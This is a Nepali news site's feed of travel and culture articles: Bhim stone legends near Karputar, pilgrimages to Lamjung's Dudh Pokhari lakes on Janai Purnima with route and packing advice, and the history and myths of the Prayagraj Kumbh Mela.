अर्कोतर्फ नेपालका धेरै गाउँ ठाउँमा पाइने भिमले ठेलो हानेको ढुङ्गा भन्ने कथा मुख्यतः महाभारतकालीन पौराणिक विश्वाससँग जोडिन्छ । महाभारतका पाण्डव दाजुभाइ वनवासका क्रममा हिमाल र पहाडी भूभाग हुँदै हिंडदा, भिमसेनलाई असाधारण शक्तिशाली मानिन्थ्यो । जनविश्वास अनुसार भिमले भारी ढुङ्गा उचाल्ने, फ्याँक्ने वा ठेलो हानेर टाढा सार्ने गर्थे । आफ्नो गाउँ ठाउँमा ठूलो ढुङ्गा देख्दा पुराना पुस्ताले यो त भिमले वनवासमा हुँदा खेल्दै वा शत्रुसँग लड्दा ठेलो हानेको भनेर कथा बनाएका हुन । यी कथाले गाउँको धार्मिक–सांस्कृतिक पहिचान बनाइ दिएको छ । कतिपय ठाउँमा त भिम ढुङ्गालाई पूजा गर्ने र मेला लाग्ने प्रचलन पनि छ । वैज्ञानिक हिसाबले यी ढुङ्गा प्रायः हिमालयीय भूगर्भीय गतिविधि, हिमनदीको वहाव वा पहिरोका कारण पुराना कालमा बगेर आइपुगेका हुन । तर इतिहास र भूगोलसँगै मिसिएको पौराणिक कथा जनविश्वासमा रहेको छ । भिमले ठेलो हानेको ढुङ्गा वास्तविक ऐतिहासिक प्रमाण नभए पनि, यो नेपाली मौखिक परम्परा, पौराणिकता र स्थानीय पहिचानको जीवित प्रतीक बनेको छ । कर्पुटारको रामबजार नजिक मादी र मिलिम नदीको किनारमा ठूलो कालो ढुङ्गा रहेको छ । त्यसलाई स्थानीयहरूले भिमले ठेलो हानेको ढुङ्गा भन्ने गर्दछन । अर्कोतर्फको ढुङ्गा कास्कीबाट लमजुङमा यसोब्रह्म शाहलाई राजा बनाउन ल्याउदा यही ढुङ्गामा टाउको जोडाएर अर्थात ठोकाएर शाह राजाको सत्ता ढुङ्गा जस्तै अटल रहोस भन्ने कामना गरेको लोक कथा पनि छ । त्यसपछि उनीहरू त्यस दिन मिदिम खोलाको किनारमा रहेको थर्पु भन्ने स्थानमा बास बसेको पनि इतिहास छ ।
भिमले ठेलो हानेको ढुङ्गा भन्ने कुरा नेपालका धेरै ठाउँमा पौराणिक लोक कथासँग जोडिएको छ । यसलाई ठ्याक्कै ऐतिहासिक तथ्यभन्दा बढी सांस्कृतिक–पौराणिक व्याख्या भनेर बुझिन्छ । तर यी कथा र ढुङ्गाहरूले गाउँको सांस्कृतिक पहिचान, धार्मिक आस्था र पुराना विश्वासलाई जोगाइरहेका छन । महाभारतका वीर पात्र भीमलाई शक्तिशाली, ढुंगा–पर्वत उठाउने, टाढासम्म फयाँक्ने वा ठेल्ने रुपमा वर्णन गरिएको छ । नेपालका विभिन्न ठाउँमा देखिने भिमले ठेलो हानेको ढुङ्गा भिमले उठाएको ढुङ्गा वा भिमले खेल्दा बनाएका डाँडाकाँडा भन्ने लोक कथाहरू सांस्कृतिक स्मृति हुन । भिमलाई लोक कथामा शक्ति र पराक्रमको प्रतीक मानिन्छ । गाउँमा ठूला–ठूला ढुङ्गा देखिँदा मानिसहरूले यसलाई भिमसँग जोडी कथाहरू बनाएका छन । नेपालमा प्रचलित भिमसँग जोडिएका ढुङ्गा पोखराको बगरमा, गोरखा, लमजुङ, तनहुँ, सिन्धुली, काठमाडौं उपत्यका, धनकुटा–तेह्रथुम क्षेत्र, पश्चिम नेपालमा सल्यान, दाङ, रोल्पा र डोटी लगायत ठाउमा भिमढुङ्गा रहेका छन । वास्तवमा यी ढुङ्गा प्राकृतिक भू–वैज्ञानिक कारणले बनेका हुन । तर जनविश्वासले यसलाई भीमसँग जोडेका छन । महाभारतकालीन पात्रहरूसँग नेपाली भौगोलिकस्थललाई जोडने परम्परा संस्कृतिसँगै प्राचीनता प्रदर्शन गर्ने एउटा तरिका हो । नेपालका विभिन्न भूभागमा भेटिने भीमले ठेलो हानेको ढुङ्गाहरू केवल पौराणिक कथा मात्र नभई गाउँ–गाउँको सांस्कृतिक जीवन, धार्मिक आस्था र लोक स्मृतिको धरोहर हुन ।
कर्पुटार कसरी पुग्ने ?
काठमाडौं, पोखरा र तनहुँको सदरमुकाम दमौलीदेखि कर्पुटारसम्म सडक पक्की बनिसकेको छ र नियमित बस सञ्चालन हुँदै आएको छ । जिप, स्कर्पियो, मोटरसाइकल, स्कुटलरलगायत निजी सवारी साधनमार्फत समेत कर्पुटार पुग्न सकिन्छ । कर्पुटार लमजुङको सुन्दरबजारदेखि कुन्छा हुदै सिसाघाट भएर अथवा सुन्दरबजारको खत्रीठाँटी देखिनै मध्यपहाडी लोकमार्ग हुदै पनि पुग्न सकिन्छ । काठमाडौबाट १८० कि.मी.पश्चिम र पोखराबाट ३२ कि.मी.पूर्वमा पर्ने कर्पुटार पर्यटकहरूले फर्कने बेला पोखरा निस्कने तीनवटा सडक छन । पर्यटकहरूको इच्छा अनुसार सडक प्रयोग गर्न सक्दछन । कर्पुटारबाट मध्यपहाडी लोकमार्ग हुदै रुपातालको समेत अवलोकन गर्दै बेगनास ताल भएर पोखरा पुग्न सकिन्छ । अर्को मार्ग हो कर्पुटारदेखि दुई पिप्ले– नेउपाने चोेक पुगेपछि मादी नदीको पुल तर्ने र पोल्यान, मुलपानी, देउराली, ढोरबेसी, राजाको चौतारो, सातमुहाने हुदै सिसुवाचोक भएर पृथ्वीराजमार्गको तालचोक पुग्न सकिन्छ । यो मार्ग दुई पिप्लेदेखि पोखरासम्म ४० किलोमिटर पर्दछ । यो सडकमार्ग पुरानो हुलाकीमार्ग अर्थात पुरानो काठमाडौ– पोखरा यात्रा गर्दा पैदल मार्ग पनि हो ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=34673 0
दूध पोखरी, पर्यटन र जनै पूर्णिमा पर्व https://www.antaranganews.com/?p=34246 https://www.antaranganews.com/?p=34246#respond Thu, 07 Aug 2025 11:09:02 +0000 https://www.antaranganews.com/?p=34246 लमजुङमा जनैपूर्णिमा दुध पोखरीमा तीर्थाटनका पर्यटकहरू पुग्ने गर्दछन । जनैपूर्णिमा श्रावण शुक्ल पूर्णिमा विशेष धार्मिक, सांस्कृतिक र सामाजिक महत्वको पर्व हो । हिन्दूहरूको पवित्र पर्व जनैपूर्णिमा अर्थात ऋषितर्पणीको दिन नयाँ जनै धारण र रक्षा–बन्धन गरी मनाउने गरिन्छ । तागाधारीहरूले नदी, तलाउ तथा कुण्डमा स्नान गरी आफ्ना गुरुबाट मन्त्रिएको जनै धारण गर्ने गर्दछन । हिन्दू धर्मशास्त्रअनुसार जनैलाई ब्रम्हासूत्र अर्थात ज्ञानको धागो पनि भनिन्छ । जनैपूर्णिमाको दिन रक्षाबन्धन पनि गरिन्छ । विशेष गरी तागाधारीहरूबाट सप्तऋषि गौतम, भारद्वाज, विश्वामित्र, जमदग्नि, बशिष्ठ, कश्यप र अत्रिलाई तर्पण दिने भएकाले जनैपूर्णिमा पर्वलाई ऋषि तर्पणी समेत भन्ने गरिन्छ ।
लमजुङ पूर्वमा चेपे नदी र पश्चिममा रुदीखोला र मादी नदी बिचमा पर्दछ । लमजुङमा हिमाली क्षेत्रमा मानव बस्ती छैन । ती क्षेत्रमा हिम ताल तलैया र धेरै ठाउमा भेडा बाख्रा, गाई भैंसीको चरिचरण अर्थात खर्कहरू पर्दछ । लमजुङमा विशेष गरी धार्मिक महत्व भएका तीन दूधपोखरी छन । लमजुङ, कास्की र मनाङको सिमानामा लमजुङ हिमालको फेदीमा रहेको दूधपोखरी, लमजुङ र गोरखाको सिमानामा बौद्ध हिमालको काखमा रहेको चेपे नदीको उदगम दूधपोखरी र मर्स्याङदी र दोर्दी गाउँपालिकाको सिमानामा हिमचुली हिमालको काखमा रहेको दूधपोखरी तीर्थाटनका लागि धेरै पर्यटकहरू पुग्ने गर्दछन । लमजुङ, मनाङ र कास्कीको सिमानामा रहेको दूधपोखरीमा नुहाउन जानेहरू पूर्णमाको अघिल्लो दिनमा नै थुर्जु खर्कमा बास बस्न पुग्दछन । थुर्जु खर्क देखि दूध पोखरी पुग्न तीन घन्टा उकालो यात्रा गर्नु पर्दछ । समुन्द्री सतहदेखि करीब ४ हजार ५ सय ८५ मिटर उचाईमा रहेको दूधपोखरी लमजुङ हिमालको काखमा पर्दछ ।
लमजुङमा रहेका दूध पोखरीको छुट्टा छुट्टै धार्मिक महत्वका कथा प्रशंगहरू पनि जोडिएका छन । थुर्जमा रहेको पश्चिम लमजुङको दूधपोखरी गुरुङ समुदायमा प्रचलित घाँटु नाँचको ऐतिहासिक राजा परशुराम र रानी यम्फावतीको कथा पनि धार्मिक प्रशगंमा जोडिएको छ । राजा रानीको विवाह, प्रेम कहानी, शिकार खेल्न गएको प्रसंग, विभिन्न राज्यसँगको लडाइँ, राज्यको रक्षाका लागि राजाले दिएको बलीदानी र रानी सती गएको प्रसंग घाँटुको कथाको सारांश भए जस्तै रानी यम्फावतीको हिमाली क्षेत्रमा मृत्यु भएको र बौक्दै ल्याउने क्रममा रानीको स्तन दूधपोखरीमा खसेकोले त्यस स्थानको नाम दूधपोखरी रहन गएको लोक कथा बनेको छ ।
करीब ४ हजार ८ सय मीटरको उचाईमा रहेको लमजुङ र गोरखाको सिमानामा रहेको दूधपोखरी च्यवन ऋषिको कथासंग जोडिएको छ । दूधपोखरीमा नुहाएपछि च्यवन ऋषिले पुनः जीवन पाएको धार्मिक शास्त्रमा उल्लेख छ । त्यसै गरी सामुन्द्री सतह देखि करीब ४ हजार ३५० मिटरको उचाईमा पर्ने मेमे, नार्सीङ, धर्म र दुध पोखरीको पनि छुट्टा छुट्टै धार्मिक कथा छन । अर्को तर्फ मेमे पोखरी जादा पदमार्गमा पर्ने ३ हजार ६ सय ५० मीटर उचाईमा रहेको बराहपोखरी भगवान विष्णुको वासास्थान भएको कथा छ ।
बिशेष गरी जनैपूर्णिमाको लागि दूधपोखरी पुग्ने तीर्थाटनका पर्यटकहरू आ–आफूलाई पायक पर्ने दूधपोखरीमा पुग्ने गर्दछन । पूर्वी लमजुङको दूध पोखरीमा लमजुङ मात्र नभएर गोरखा, तनहूँ र चितवन लगायतका जिल्लाबाट जनैपूर्णिमा तीर्थाटनका लागि पुग्ने गर्दछन । चेपे नदीको उदगमस्थलमा रहेको दुधपोखरी दुधपोखरी गाउँपालिका– १ मा पर्दछ । जनैपूर्णिमाका दिन दुधपोखरीमा स्नान गरी तीर्थाटन गरेमा सम्पूर्ण पाप नष्ट भै मोक्ष प्राप्त हुने र पितृलाई तर्पण दिए पितृ ऋणबाट मुक्त हुने धार्मिक विश्वास छ ।

नेपालको एक मात्र सिकार आरक्ष क्षेत्रमा पर्ने बुकीपाटनस्थित फागुन क्षेत्र । समुद्री सतहदेखि करिब चार हजार २०० मिटरको उचाईमा अवस्थित यस क्षेत्रमा बर्खायाममा हरियाली र मनोरम देखिने हुँदा आन्तर

दूधपोखरी जान तनहँुको डुम्रेबाट लमजुङको पाउँदी हँुदै गौडा, इलम पोखरी लिपेलेक भएर अथवा डुम्रे–तुतुरे पालुङटार भएर राइनासटार हुदै बिचौर भएर पनि जान सकिन्छ । दूध पोखरीमा नुहाउँदा महत्वपूर्ण केही सामान छोडिएको भएमा पनि लिन जान नहुने जनविश्वास रहेको छ । सामान लिन फर्किएमा पोखरीमा कामना गरेको मनोकामना पूरा नहुने भनाइ पनि छ । दूधपोखरी जानका लागि गोरखाको भच्चेकसम्म गाडीमा गएर भच्चेक, सिरानडाँडा, ओलाङ, खिन्पु, औलेमाडी, कालढुङ्गे हुदै पनि दूधपोखरी पुग्न सकिन्छ ।
दोर्दी गाउँपालिकाको पश्चिम उत्तरमा रहेको दूध पोखरी वरपर मेमे, नार्सीङ, धर्म पोखरी पनि पर्दछ । यी पोखरीहरू मध्ये सबैभन्दा ठूलो मेमे पोखरी रहेको छ । हिमचुली हिमालको काखमा वरिपरी हिमले चुसेका तिखा डाँडाकाँडाका बिच रहेको छ मेमे पोखरी । मेमे पोखरी र दुध पोखरी जाने बाटो धेरै छन । मेमे पोखरी जादा बाह्रपोखरी पनि पुग्ने हो भने चिति– माझगाउँ, पुरानो दुबार हुँदै बाह्रपोखरी समेत अवलोकन गरी मेमे र दूध पोखरी पुग्न सकिन्छ । अर्को बाटो बेसीशहरदेखि भुष्मे, छिनखोला, दुबार हुँदै बाह्रपोखरी पुग्ने र त्यसपछि मेमे पोखरी भएर दुध पोखरी पुग्न सकिन्छ । तर बाह्रपोखरी नपुगेर सिधै मेमे र दुध पोखरी जाने हो भने दोर्दी खोलाको शिरमा पर्ने ताजे गाउँबाट केही माथि पुगेपछि दोर्दी खोला तर्ने र उकालोबाटो भएर पनि मेमे पोखरी पुग्न सकिन्छ । उकालो बाटोमा पर्ने श्यायुडाँडाबाट सुरुहुन्छ भिर र चट्टानको सारै असजिलो बाटो । त्यसपछि भेटिन्छ जोरङडाडा । त्यसपछि पनि उकालो यात्रा गर्दै जादा भेटिन्छ छविगौंडा र उकालो सकिन्छ । दुध पोखरी र मेमे पोखरी उच्च हिमाली क्षेत्रमा पर्ने र मानव बस्तीबाट निकै टाढा भएकोले यात्रा कठिन भए पनि मनोरम प्राकृतिक दृश्यावलोकन गर्दै जाँदा प्राकृतिक सुन्दरताले यात्रामा छुट्टै अनुभव हुन्छ । मेमे पोखरी पुगेपछि नजिकै देखिन्छ नार्सीङ, धर्म र दुध पोखरी । यी पोखरी मध्य सबैभन्दा माथि दुध पोखरी पर्दछ ।
मनाङ, कास्की र पश्चिम लमजुङको सिमानामा पर्ने थुर्जु खर्कभन्दा माथिको दुधपोखरी बिशेष गरी गुरुङजातिका भेडि गोठालाहरूले पुज्ने पोखरी हो । थुर्ज खर्कमा लमजुङका ताघ्रीङ, जगत, अर्खले, सिउरुङ, धनपोखरा, भुजुङ, पसगाउँ लगायतका गुरुङ जातिहरूको भेडा गोठ भदौ महिनामा पुग्ने गर्दछ । जनैपूर्णिमाको बेला प्रत्यक गाउँहरूबाट भेला गोठालाहरूलाई खर्च पु¥याउन गाउँका चेलिबेटीसमेत थुर्जु खर्कमा पुग्दछन । जनैपूर्णिमाको दिन दूध पोखरीमा पुजा गरेपछि गुरुङ सस्कृतिको सारङी गीत गाएर रमाइलो गर्ने पुरानो परमपरा हो । यो दूध पोखरीमा आजभोलि कास्की जिल्लाका बिभिन्न गाउँ र पश्चिम लमजुङका धेरै मानिसहरू जनैपूर्णिमामा तीर्थाटनका लागि पुग्ने गर्दछन । दूध पोखरी पुग्नको लागि सैचिखर्क, मैदुखर्क, खेखु खर्क, नैसिमा, क्युबारा, तमखो, खुदिचे, सारङी पाखा हुँदै पुग्न सकिन्छ । गुरुङहरूको प्राचीन बस्ती ताङतिङदेखि करापुडाँडा– ताप्रो– क्होलासोंथर– ठूलो लेक थुर्जु दूधपोखरी– गुरुङ देउराली– डाँफे खर्क–तिमाङ जोड्ने पदमार्गको निर्माण हुन लागेको छ ।

लमजुङको हिमाली क्षेत्र प्राकृतिक सुन्दरता छ । जहा पर्यटकहरूलाई रमाउन कुनै कृत्रिमताको आवश्यता पर्दैन । प्रकृतिप्रदत्त छटा, छहरा, छाँगा, झरना, हिमाल, पहाड, ताल, तलैया, पोखरी, दह, डाँडाकाँडा, उच्च ढिस्को, वनजंगल, खहरे, खोल्सो, खोलानाला, नदी, खोँच, गल्छी, भीर, पहरा, ओढार, प्राचीन घरहरूको भग्नावशेष आदि पर्दछ । दूधपोखरी क्षेत्रको यात्रा गर्दा मनोरम प्राकृतिक दृश्य, सेता हिउँले ढाकिएको हिमाल र मनोरम पहाडी दृश्यले धेरै तीर्थाटन पर्यटकहरूको मन लोभिन्छ । दूधपोखरी फेदीका घाँसे मैदान, पहाडी भूभाग, डाँडाकाँडा, बनजंगल र समथर गाई भैंसी र भेडा गोठले यात्रामा पर्यटकहरूलाई छुट्टै अनुभूति हुन्छ । अर्को तर्फ दूध पोखरीको यात्रामा बौद्ध हिमाल, मनास्लु हिमाल, हिमचुली हिमाल, लमजुङ हिमाल र अन्नपूर्ण हिमश्रृखलाको दृश्य पनि देखिन्छ । यात्रामा मौसम खुलेको बेलामा पोखरी वरपर सुन्दर्ताको बर्णन गर्न नसकिने हजारौं रगंका प्राकृतिक हिमाली भेगमा फुल्ने रङगीचङगी पूmलहरू र त्यहाँको वातावरणले सबै तीर्थयात्रीहरूलाई मोहित बनाउछ ।

जनै पूर्णिमा किन यात्रामा ?
तर धेरैको मनमा जिज्ञासा हुन्छ जनै पूर्णिमा पर्वमा गाउँघरकै खोलानाला र मन्दिरमा पूजा गर्न सकिन्छ, ? ऋषिपूजा पनि स्थानीय देवालयमै सम्पन्न गर्न सकिन्छ भने मानिस किन दूध पोखरी जाने ? यो प्रश्नको उत्तर धार्मिक ग्रन्थ, समाजशास्त्र र मनोविज्ञानको दृष्टिबाट खोज्न आवश्यक छ । पवित्र जल र स्नानको आध्यात्मिक धारणा पनि छ । जनैपूर्णिमामा स्नान गर्ने चलनलाई शुद्धि र पापमोचनको प्रतीक मानिन्छ । सामान्यतया गाउँघरको पोखरी वा खोलामा स्नान गर्दा शरीर मात्र सफा हुन्छ । तीर्थ स्नानमात्रले जन्म–जन्मान्तरका पाप क्षय हुन्छ भन्ने विस्वास पनि छ । यसैले तीर्थस्नानलाई सामान्य स्नानभन्दा भिन्न आध्यात्मिक अनुभवको यात्रा मानिन्छ । मानिसहरू घरको पोखरी छाडेर कठिन बाटो हिँडेर दूध पोखरी पुग्नुको कारण यही हो । अर्कोतर्फ धार्मिक यात्रा आफैंमा तपस्या र आत्मशुद्धि पनि हो । धार्मिक यात्रा केवल पूजाअर्चन मात्र होइन, यो आत्मिक साधनाको एक रुप हो । जब मानिस घरमै पूजा गर्दछ भने दैनिक जीवन र संसारिक बाध्यतासँगै रहन्छ ।
तर यात्रा गर्दा, मानिस आफ्नो सामान्य परिवेश छाडेर संपूर्ण ध्यान धर्म, भक्ति र साधनामा केन्द्रित हुन्छ । लामो यात्रा, प्राकृतिक दृश्य, सामूहिक भक्ति र सांस्कृतिक मेलमिलापले मानिसलाई मानसिक ताजगी र आत्मबल प्रदान गर्छ । आधुनिक धार्मिक यात्रा आत्म– पुनः निर्माणको साधन हो । तीर्थ पुग्ने यात्रामा मानिस पुरानो तनाव, क्लान्ति र नकारात्मकता फयाँक्छ र नयाँ उर्जा लिएर फर्कन्छ । मानिस जनैपूर्णिमा वा अन्य धार्मिक पर्वमा यात्रा गर्नु केवल परम्परा वा अन्धविश्वास मात्र होइन । यो धार्मिक आस्था, सामाजिक सम्बन्ध, सांस्कृतिक निरन्तरता र मानसिक स्वास्थ्यसँग गाँसिएको बहुआयामिक अभ्यास हो । गाउँघरकै खोलामा स्नान र मन्दिरमा पूजा गरे पनि, यात्रा स्वयं एउटा आध्यात्मिक तपस्या हो । धार्मिक यात्राले शरीर र मन दुवैलाई परीक्षित बनाउँछ । समाज र संस्कृति सुदृढ बनाउँछ, र आत्मामा नवीनता र शान्ति भर्छ । त्यसैले हरेक वर्ष जनैपूर्णिमामा मानिसहरू घर छाडेर तीर्थयात्रामा निस्कन्छन । किनकि यात्रा स्वयं मुक्ति र अनुभवको अर्को संसार हो ।

दूधपोखरी जानु हुन्छ भने पदयात्राका लागि चाहिने सामग्री जुटाउनु पर्दछ । पदमार्गमा खान बस्नको लागि भेडा गोठ र गाई भैंसीका गोठ भेटिन्छन । तर पनि यात्राको लागि आवश्यक सबै बस्तु साथमा जैजान पर्दछ । पदयात्राको लागि जुत्ता बाक्लो सोल र ग्रिप भएको, झट्ट पानी नछिर्ने, हिलो र हिउँमा नचिप्लने चाहिन्छ । यात्रामा जादा फेदर डाउन ज्याकेट लगायत न्यानो लुगा साथमा हुनु पर्दछ । नियमित खाने गरेको औषधि छ भने नबिर्सिइ झोलामा राख्नु पर्दछ । अर्कोतर्फ धेरै दिनसम्म ब्याकअप दिने मोवाइलको चार्जर झोलामा राख्न बिर्सन हुँदैन ।

(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=34246 0
कुम्भ मेला, पर्यटन र सांस्कृतिक महत्व https://www.antaranganews.com/?p=29836 https://www.antaranganews.com/?p=29836#respond Tue, 04 Feb 2025 00:22:33 +0000 https://www.antaranganews.com/?p=29836 विश्वमा औपचारिक रुपमा पर्यटन व्यवसाय सुरु भएको करिव एक सय ८१ वर्ष भएको इतिहास छ । तर धार्मिक पर्यटन अर्थात तीर्थयात्रा संसारकै पुरानो पर्यटन मानिन्छ । युनेस्कोका अनुसार बिश्वका ६० प्रतिशत मानिस कुनै न कुनै धर्मको अभ्यास गर्छन र उनीहरू तीर्थाटनका लागि विभिन्न धार्मिकस्थहरूमा पुग्ने गर्दछन । नेपालमा धार्मिक पर्यटनको महत्व छुट्टै छ । प्राचीन कालदेखिनै नेपालीहरू चारधामको यात्रा गर्दै आएका छन । चारधाम हिन्दूहरूको लागि अत्यन्त पवित्र स्थल मानिन्छ । चारधामको नामांकन हिन्दू धर्मका जगतगुरु आदि शंकाराचार्यले गरेका हुन । चारधाम भारतको भिन्न भिन्न राज्यमा पर्दछ ।
सत्ययुगमा पनि ब्रह्मा, विष्णु र महेश्वरले तीर्थाटन गर्नुभएको वर्णन शास्त्रमा उल्लेख छ । त्रेतायुगमा रामचन्द्र भगवान र द्वापरयुगमा श्रीकृष्ण भगवान वलराम लगायत पाण्डवले समेत तीर्थाटन गरेको महाभारतमा छ । प्राचीनकालदेखि नै तीर्थ यात्रा निस्कने परम्परा थियो । तीर्थको बारेमा पद्मपुराणमा पनि वर्णन गरिएको छ । आजभोलि भारतको प्रयागराजमा विश्वप्रसिद्ध महाकुम्भ मेला चलिरहेको छ । महाकुम्भ मेलाको धार्मिक र सांस्कृतिक महत्व छ । महाकुम्भ मेलाले विश्वभरका धार्मिक पर्यटकहरूलाई आकर्षित गरेको छ । अहिले कुम्भ मेलामा नेपाल भारत मात्र होइन तेस्रो मुलुकका पर्यटकहरूको पनि उत्साहपूर्ण सहभागिता भएको छ । दक्षिण कोरिया, जापान, स्पेन, रुस, संयुक्त राज्य अमेरिका, इटाली, अर्जेन्टिना लगायतका देशका हजारौं खोज अनुसन्धानमा रुचि राख्ने पर्यटकहरू महाकुम्भ मेलामा पुगेका छन । कुम्भमेलाले केवल अध्यात्मिक शान्तिका लागि मात्र नभएर सांस्कृतिक अध्ययन र विश्वभरका समुदायहरूसँगको सम्पर्कको माध्यम पनि भएको छ । महाकुम्भ मेला संसारकै सबैभन्दा ठूलो धार्मिक, सांस्कृतिक आध्यात्मिक भेला हो । महाकुम्भ मेला धार्मिक उत्सव मात्र होइन तीर्थाटन पर्यटकहरूका लागि आस्थाको महासागर पनि हो । संयुक्त राष्ट्रसंघ समेतले महाकुम्भ मेलालाई मानव जातिको अमूर्त सम्पदाको मान्यता दिएको छ ।
प्रयागराजमा गंगा, यमुना र पौराणिक नदी सरस्वतीको संगमस्थलमा प्रत्यक १२ वर्षमा आयोजना हुने कुम्भ मेला यहि १ माघदेखि सुरु भई ४५ दिन अर्थात शिवरात्रीसम्म चल्ने छ । कुम्भमेला स्नान गर्न महत्वपूर्ण तिथि माघे सक्रान्ति, मौनी औंसी, वसन्त पञ्चमी र महाशिवरात्रीलाई विशेष महत्व दिने गरिन्छ । यी ४ दिनको स्नानलाई शाही स्नान भनिन्थ्यो । तर अहिले अमृत स्नानको नामाकरण गरिएको छ । यो पटक माघे सक्रान्तिको दिनमा अमृत स्नान सम्पन्न भएको छ । इलाहाबादको प्रयागराज यतिखेर महा कुम्भमय भएको छ । प्रयागराजको त्रिवेणीमा स्नान गर्नाले पापको प्रायश्चित भई पुण्यप्राप्ति हुने र मृत्युपछि मोक्ष हुने तीर्थाटनका पर्यटकहरूको मान्यता छ । महाकुम्भ स्नान गर्न दैनिक हजारांैको सख्यामा नेपालबाट समेत तीर्थयात्री पर्यटकहरू पुगेका छन । प्रयागराजमा पुग्ने पर्यटकहरूले कुम्भको इतिहास खोज्दछन । कुम्भको शाब्दिक अर्थ कलश वा घडा हो । वैदिक युगमा घडालाई कुम्भ भनिन्थ्यो । संस्कृति विज्ञकाअनुसार ऋग्वेदमा घडालाई कुम्भ भनिएको छ । घडा घाटमा स्नान गर्न र पानी सग्रह गर्न प्रयोग गरिन्थ्यो । माटो, तामा र पित्तलका घैला निर्माण गरिन्थे । मन्दिरमा चढाउन वा विशेष दान गर्न सुनका घडा बनाइन्थे । हिन्दूहरूको कुनै पनि यज्ञ, पूजा अनुष्ठान कलश स्थापनाबाट सुरु हुनु कुम्भकै प्रतीक हो ।
तर कुम्भको नाममा यति ठूलो धार्मिक तीर्थाटन मेलाको उत्पत्ति र विकास कसरी भयो ? पर्यटकहरू कुम्भमेलाको ऐतिहासिक तथ्य जान्न खोज्दछन । कुम्भ मेलाका मुख्य दुई पौराणिक कथासंग जोडिएको छ । बैकुण्ठबाट अमृत हरण र समुद्र मन्थनसँग जोडिएको कथन प्रचलित छ । पहिलो कथा ऋषि कश्यपसंग र दोस्रो दैत्य र दानवले समुद्र मन्थन गर्दाको प्रशंग उल्लेख छ । पौराणिक कथा अनुसार बैकुण्ठबाट अमृत हरण र समुद्र मन्थन, ऋषि कश्यपका दुई पत्नी कद्रु र वनिताले सन्तान मागेका, गरुडलाई बैकुण्ठबाट अमृत चोरेर ल्याउन भनिएको कथा प्रशङ्ग छ ।
अर्को कथा दैत्य र दानवले समुद्र मन्थन गर्दा निस्किएका १४ रत्नमध्ये एक अमृत घडा थियो । अमृत घडा वैद्यराज धन्वन्तरीको हातमा थियो । जब अमृत कसले खाने भन्ने विषयमा सुर र असुरबीच विवाद भयो । दैत्यराज बलीको सेना स्वरभानु घडा खोसेर आकाशमा उड्यो । देवराज इन्द्रका छोरा जयन्तसँग पनि आकाशमा उड्ने क्षमता थियो । इन्द्रले जयन्तलाई स्वरभानुबाट अमृत घडा खोस्न आदेश दिए । अमृतको घडा आफ्नो कब्जामा लिन देवता र राक्षस बीच १२ दिनसम्म युद्ध चलेको थियो । आकाशमै स्वरभानु र जयन्तबीच अमृत घडा खोसाखोस हुँदा उत्तराखण्ड हरिद्वारको गंगातट, मध्यप्रदेश उज्जैनको शिप्रा नदी, महाराष्ट्र नासिकको गोदावरी नदी किनार र उत्तरप्रदेश प्रयागराजको त्रिवेणी ४ स्थानमा अमृतको थोपा चुहियो । र कुम्भ मेलाको थालनी भयो ।
कुम्भ मेला ४ प्रकारका हुन्छन । १२ औं वर्षको मेलालाई पूर्ण कुम्भ भनिन्छ । यो मेला प्रयागराजमा मात्र लाग्दछ । ६÷६ वर्षमा लाग्ने मेलालाई अर्धकुम्भ भनिन्छ । यो प्रयागराज र हरिद्वारमा लाग्दछ । वार्षिक स्नानलाई भने कुम्भ भनिन्छ । त्यो मेला ४ वटै स्थानमा हुन्छ । १२ वटा ‘पूर्ण कुम्भको चक्रलाई महाकुम्भ’ भनिन्छ । अर्थात महाकुम्भ प्रत्येक १४४ वर्षपछि दुई शताब्दी छोएर आउँछ । यस पटकको प्रयागराजको मेला ‘महाकुम्भ’ हो । यस अघिको महाकुम्भ मेला सन् १८८२ मा भएको थियो । प्रयागराज मेलाको अवधि सूर्य, चन्द्र र बृहस्पति ग्रहको ज्योतिषीय स्थान गणनामा आधारित हुन्छ । जब सूर्य र चन्द्र मकर राशी र बृहस्पति ग्रह वृषभ राशीमा हुन्छ त्यो बेला प्रयागराज कुम्भ मेला लाग्दछ ।
महाकुम्भको इतिहास निकै पुरानो छ । केही ग्रन्थहरूका अनुसार सत्ययुगमा पहिलो महाकुम्भ मेला आयोजना भएको मानिन्छ । तर, यसलाई अंग्रेजको शासनकालमा आएर मात्र औपचारिक रुपमा कुम्भमेला भन्न थालिएको इतिहास छ । इतिहास अनुसार ७ औं शताब्दीका चिनियाँ यात्री हु वान साङले कुम्भ मेलाको चर्चा गरेका थिए । हु वान साङले माघे सक्रान्ति स्नानका लागि राजा हर्षवर्धनले शिविर बनाएर भाग लिएको मेलाका रुपमा कुम्भको वर्णन गरेका छन । कतिपयले कुम्भ मेला सुरुवात ८ औं शताब्दीका धर्म गुरु शंकराचार्यलाई दिने गर्दछन । त्यो बेला हिन्दू धर्म भन्दा बौद्ध र जैन धर्मको प्रचार व्यापक थियो । त्यहि बेलामा शंकराचार्यले अद्वैत वेदान्तको दर्शनसहित हिन्दूत्व जागरण अभियान सुरु गरेका थिए । जागरण अभियान प्रयोजनका लागि आयोजना गरेको हिन्दू जागरण सभाले कुम्भ मेलाको रुप लिएको तर्क पनि गरिन्छ । जहाँ सृष्टिकर्ता ब्रह्माले पहिलो यज्ञ गरेका थिए । प्रयागराजको अर्थ तीर्थहरू मध्यको सर्वश्रेष्ठ तीर्थ हो । सन् १५७५ मा मुगल सम्राट अकबर प्रयागराजमा पुगेका थिए । सम्राट अकबरले प्रयागराजको नाम परिवर्तन गरी इलाहावाद राखेका हुन । अकबरले हिन्दूको इश र र इस्लामको अल्लाह दुवैका देवताको बास भएको ठाउँ भन्ने अर्थमा इलाहावाद नाम राखेको इतिहास छ । इलाहाबादको अर्थ अरबी भाषामा ईश्वरद्वारा बसाइएको वा ईश्वरको शहर भन्ने हुन्छ । तर सन् २०१८ बाट पुनः प्रयागराज भन्न थालिएको छ ।
